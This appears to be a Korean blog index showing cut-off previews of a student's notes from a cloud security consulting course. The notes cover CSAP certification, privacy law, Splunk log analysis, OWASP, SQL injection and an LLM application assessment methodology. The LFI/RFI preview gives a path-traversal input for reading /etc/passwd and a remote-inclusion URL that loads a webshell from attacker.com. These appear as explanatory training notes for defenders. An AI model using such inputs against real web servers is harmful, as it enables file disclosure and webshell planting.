news6001 님의 블로그

SK쉴더스 성동캠퍼스 2기 클라우드 보안 컨설팅 실무 Day 4: 보안 컨설팅과 취약점 진단

CSAP 보안인증제도 목적 및 필요성- 국가 공공 기관에게 안정성 및 신뢰성이 검증된 민간 클라우드 서비스 공급- 객관적이고 공정한 클라우드 서비스 보안 인증 제도를 실시하여 이용자의 보안 우려를 해소하고, 클라우드 서비스의 경       쟁력 확보 보안인증 유형 등급 및 종류- 인증 유형 : IaaS, SaaS, DaaS 인증 유형으로 구분되며, 유효기간은 5년으로 운영- 인증 등급 : 상 중 하 등급으로 구분되며, 유효기간은 5년으로 운영 최초평가  ->  사후평가(총 4회 수행)  ->  갱신 평가              (1년)                                   (1년) 보안인증제도 조직 및 역할  보안인증제도 기대효과CSP 관점객관적이고 공정한 클라우드서비스 보안인증을..

SK쉴더스 성동캠퍼스 2기 클라우드 보안 컨설팅 실무 Day 3: 클라우드 서비스 이용자를 위한 보안 컨설팅

간략 흐름도지원자 -> 신입학 지원 -> 대학홈페이지 -> 종합정보시스템DB -> 파일 서버(백업) -> 10년 지원자(정보)합격자 -> 증빙서류 제출 -> 입학처 -> 서류철 -> 20년(입시관련 서류) 개인정보를 수집하는 경우 법률에 근거하거나 정보주체의 동의를 받고 있는가? Y수집근거에 보면 정보주체 동의를  알 수 있다.개인정보를 수집하는 경우 목적에 필요한 최소한의 범위에서만 수집하는가 Y입시업무에 필요한 최소한의 범위에서 개인정보를 수집하고 있음. 주민등록번호는 법적 근거가 있는 경우에 한하여 수집하고 있는가? Y 고등교육법시행령 제73조 제73조(고유식별정보의 처리) ① 교육부장관(제4조의10에 따라 교육부장관의 업무를 위탁받은 자를 포함한다), 대학의 장 및 학교협의체는 다음 각 호의 사무..

SK쉴더스 성동캠퍼스 2기 클라우드 보안 컨설팅 실무 Day 2: 클라우드 컨설팅 과 개인정보보호법

디플로이먼트 모델 배치 모델 범주공동보안책임모델 관리적인 영역 보안목표기밀성, 무결성, 가용성 관리 보안 영역내부 관리계획 헌법 비슷한느낌전체의 보안 시스템을 구현 할거냐 보안 고려 사항(기술적 보안 영역)루팅/탈옥 탐지보안 장비  회사 메일은 DMZ에 있음 웹서버에 메일서버도 같이 존재  솔루션은 프로그램장치에다가 프로그램이 올라간 경우 : 접근제어시스템 프린트를 출력했던 파일들을 다가지고 있는 경우가 있음 : 출력물 보안허용된 USB만 사용할수 있게 하는 : 이동저장매체보안PC보안 정책 : 화면보호기,윈도우 비밀번호유해사이트 차단 : 도박사이트등 유해한 사이트를 접속할때 사용하는 솔루션 웹 방화벽 wapple 많이 사용  msp (Managed Service Provider) : 시스템 구성을 해주는..

클라우드 컴퓨팅  어쩌다 보니 UAM(Urban Air Mobility, 드론택시) 시스템에 보안 컨설팅을 하게 되었다.해킹 등으로 부터 안전한 시스템을 만들기 위해어떤 점을 고려하여야 한다고 말할 것인가?의견들 :다른 프로토콜 SSL 처럼 보안을 집어 넣음 OWASP TOP10 보안 검증을 했는지 클라우드 컴퓨팅 서비스란서비스 형태로 공유함공유경제,구독경제 클라우드 컴퓨팅 서버를 안사고 빌려쓰는것인데 쏘카 같이 빌려쓴다 기다리지 않고 일정한 금액을 내고 쓰는 것 클라우드 컴퓨팅 발전 및 이용자 보호에 관한 법률집적(밀도를 높임) 공유된 정보통신기기, 정보통신 설비, 소프트웨어 등 정보통신 자원을 이용자의 요구나 수요변화에 따라 정보통신망을 통해 유연하게 이용할 수 있도록 하는 정보처리체계TTA클라우드 ..

시큐리티어니언IP 확인 필수Kali에서 Ping 확인ssh admin@192.168.x.xyespassword 넣어주기명령어 몇가지 알고 있기 kaliwget pcap 압축 파일 unzip  Splunkstream:http >> web 접속 로그 추정sysmon : sysmon 로그fgt_utm : 포티게이트 방화벽 로그stearm : dns : dns 쿼리 로그stearm : tcp New Search 1번 문제 index="botsv1" earliest = 0 sourcetype ="suricata"  CVE-*alert.actionalert.category5. imreallynotbatman.com 에 대해 무차별 암호 대입 공격을 시도할 가능성이 있는 IP 주소는 무엇입니까 ?URL 기반 :특정 ..

대문자 X 옵션 보안뉴스 보면서 공부Log4j 데일리시큐리티 kisa 국정원 보안뉴스 계속 보기 SNS 하지말고~~크롤러 하나 만들어서 메일로 확인하기 감지는 alert을 보면 됨 예시) 26개 규칙은 event  항목을 보면됨 (Limits 아래에 Event :)alert tcp any any any any (msg:"size between"; dsize:770855; sid:10000001;)많은 공격기법에 대해서도 박학다식해야 한다.aws 로그 분석 ※ 클라우드 환경 -> watch※ 다이렉트로 가지고올건지클라우드와 관련된건 Strings으로 뽑아와야한다. 클러스터라는 노드를 가지고 있다면 관리는 편하다 구성이 복잡해질 수 있다.1.watch로 로그를 보내기2.splunk로 로그를 받기 순서도1...

□LFI/RFI: 파일참조 공격, 페이지 내 다른 파일을 참조하는데서 취약점이 발생함함수 : include컴포넌트쪽 공격취약점 구조 : 소스코드 내 'admin?page../../../test.html' 와 같은 구조를 가지고 있음LFI : 로컬 파일 참조>> admin 페이지가 실행되는 서버의 파일을 참조하는 공격(웹서버)>> ../../../../../../etc/passwd 와 같이 입력하여 로컬에 있는 파일 참조../ : 상위 디렉토리 지정 문자열이 핵심, 인코딩 작업을 수행함, HTML,URL, 2중URL 등RFI : 원격 파일 참조>> 원격에 있는 페이지를 웹서버로 임포트하여 실행되는 공격리모트예시 http://attacker.com/webshell >>> 웹셸이 업로드된 효과http:// :..

[2일차]-OWASP Top 10 기준선(2021년 기준이 최신, 4년에 한번 개정  :: 웹 취약성을 연구하는 연구원들이 4년마다 많이 발생한 웹 취약성을 목록화 발표-NIST 기준(WEB취약성 31개)-주요통신기반시설 취약점 점검 가이드 라인(28개), 공개, 행안부 2021년-전자금융기반시설 취약점 점검 가이드(48개), 비공개, 금융보안원 2024년-행정안전부 SW취약점 개발 가이드(49개), 공개, 행안부 2021년-국정원 정보보안관리실태평가(13개), 비공개, 국정원, 2024  SQL Injection :SQL 쿼리(데이터베이스)를 통해 발생하는 취약점  DB를 사용하는 경우: 회원가입,로그인,게시판 조회(검색) select id,pw from users where id='admin' and..

보안관제보안 모니터링 : 실시간으로 모니터링하여 비정상적인 활동 정탐인지 오탐인지를 확인해 보고 언더에서 활동하는 나라에서 위협을 가하는 경우가 있음사이버 위협 탐지 : 위협을 감지하여 조직의 보안을 유지함사고 대응 및 조치 : 보안 관제는 위협이 감지될 경우 즉각적으로 조치를 취하여 사고의 확산을 막는다.로그 분석 및 보고 : 일일보고,주간,연간 보고 체계를 구성해서 결국에는 관제나 컨설팅은 중간 과정이 중요한 것보단 결과가 중요해서 보고를 빠르게 하는 것이 중요하다. 주어진 날짜에 명확하게 해야 하기에 실력이 중요하다. 신뢰도가 우선시 여기기에 보고서는 기한 내에 작성한다.보안 교육과 훈련: 조직 내부의 보안 인식과 컨플라이언스를 강화한다. 최근의 동향을 계속해서 파악하는게 중요하다. 사이버 위기대응..

https://www.skshieldus.com/kor/media/newsletter/insight.do 인사이트 리포트 | SK쉴더스고객님들이 캡스에 자주 묻는 질문들, 빠르게 해답을 찾아보세요.www.skshieldus.comLLM Application 취약점 진단 가이드를 발췌했습니다. 진단 방법론사전 협의 및 범위 선정 -> 대상 분석 및 계획 수립 -> 위협 분석 -> 위협 검증 -> 대응 방안 수립 사전 협의 및 범위 선정 : 업무 수행에 있어 기본적인 사항에 대해 업무 담당자와 협의를 수행하고 사전 정의를 위해 수행하는 단계입니다.대상 분석 및 계획 수립 : 진단 대상에 대한 정보를 수집하고 분석하는 단계입니다.위협 분석 : 주요 예상 위협들을 분류하고 시나리오를 예상하는 단계입니다.위협 검..